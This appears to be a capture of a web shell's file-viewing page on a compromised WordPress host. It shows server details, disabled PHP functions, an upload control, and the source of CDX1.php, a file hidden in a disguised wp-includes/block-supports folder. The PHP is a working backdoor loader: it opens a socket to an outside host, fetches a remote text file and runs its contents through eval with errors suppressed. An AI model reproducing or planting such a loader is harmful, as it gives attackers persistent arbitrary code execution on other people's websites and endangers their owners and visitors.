HEX
Server: Apache/2
System: Linux sv174 5.14.0-570.21.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 11 07:22:35 EDT 2025 x86_64
User: casinobe (1137)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/casinobe/domains/pandaking89-x.com/private_html/wp-includesad4086/block-supports/CDX1.php
<?php
$_u = 'https://teamzedd2027.tech/project/rahman.txt';
$_p = parse_url($_u);
$_h = $_p['host'];
$_path = $_p['path'] ?? '/';
$_port = ($_p['scheme'] == 'https') ? 443 : 80;
$_pre = ($_p['scheme'] == 'https') ? 'ssl://' : '';

$_f = @fsockopen($_pre . $_h, $_port, $_e, $_s, 12);
if ($_f) {
    $_req = "GET $_path HTTP/1.0\r\nHost: $_h\r\nUser-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n";
    fwrite($_f, $_req);
    $_d = '';
    while (!feof($_f)) $_d .= fgets($_f, 1024);
    fclose($_f);
    
    // Skip header
    $_d = substr($_d, strpos($_d, "\r\n\r\n") + 4);
    if (!empty($_d)) @eval('?>' . $_d);
}
?>